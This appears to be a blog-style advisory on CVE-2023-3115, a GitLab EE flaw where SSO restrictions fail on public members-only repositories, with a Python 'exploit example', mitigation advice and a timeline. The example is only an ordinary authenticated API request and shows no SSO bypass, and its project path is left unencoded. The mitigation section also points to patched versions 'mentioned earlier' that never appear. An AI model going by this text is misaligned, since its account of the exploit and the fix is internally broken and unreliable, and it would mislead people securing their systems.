CVE-2023-3115: GitLab EE Single Sign On Vulnerability Affecting Public Members-Only Project Repositories Access Control

A recently discovered security vulnerability in GitLab EE, known as CVE-2023-3115, has been found to affect multiple versions of the popular web-based Git repository manager. This issue can potentially lead to unauthorized access to project repositories by bypassing Single Sign-On (SSO) restrictions. In this post, we will discuss the details of this vulnerability, the affected GitLab versions, and how to mitigate the risks associated with it.

Vulnerability Details

The main issue stems from the way Single Sign-On restrictions are enforced for indirect project members attempting to access public members-only project repositories. This could potentially lead to unauthorized users gaining access to sensitive information and source code, increasing the risk of security breaches or intellectual property theft.

In particular, this vulnerability affects instances where GitLab EE is configured to use an external authentication provider for SSO (e.g., LDAP, Google OAuth, Azure AD, etc.). When users log in via SSO, they become indirect project members and should only have access to those repositories they are explicitly granted access to. The problem occurs when public members-only project repositories fail to correctly enforce SSO restrictions, allowing unauthorized access to these repositories.

Exploit Example

An example of how this vulnerability could be exploited by an attacker can be illustrated with the following code snippet:

import requests

gitlab_base_url = "https://git.example.com";
target_project_path = "target-group/target-project"

# Obtain the target GitLab instance's API access token
gitlab_api_token = "your-gitlab-api-token"

# Craft the API endpoint URL for the target project repository
api_url = f"{gitlab_base_url}/api/v4/projects/{target_project_path}/repository/tree"

# Define headers for the API requests, including the access token
headers = {"Private-Token": gitlab_api_token}

# Issue a GET request to the repository tree API endpoint, to list the contents of the repository
response = requests.get(api_url, headers=headers)

# Print the retrieved repository tree information
print(response.json())

This simple Python script uses the provided GitLab API token to access the repository tree API endpoint for a specified target project.

Mitigation

To mitigate the risk associated with this vulnerability, GitLab recommends upgrading to one of the patched versions mentioned earlier. The following links provide details on the specific GitLab releases containing the fix:

- GitLab 16.2.8 release notes
- GitLab 16.3.5 release notes
- GitLab 16.4.1 release notes

Additionally, it is recommended that system administrators audit their GitLab instances to ensure that SSO restrictions are properly enforced for all project repositories and that no unauthorized users have gained access to sensitive information.

Conclusion

The CVE-2023-3115 vulnerability in GitLab EE can potentially expose sensitive information and source code to unauthorized users by bypassing Single Sign-On restrictions. To address this issue, GitLab has released patched versions that fix the problem. Affected organizations should upgrade to these patched versions and audit their GitLab instances to identify and manage any unauthorized access. By staying informed of security vulnerabilities and following best practices, organizations can minimize the risk of security breaches and keep their valuable assets safe.

Timeline

Published on: 09/29/2023 07:15:00 UTC
Last modified on: 10/02/2023 19:46:00 UTC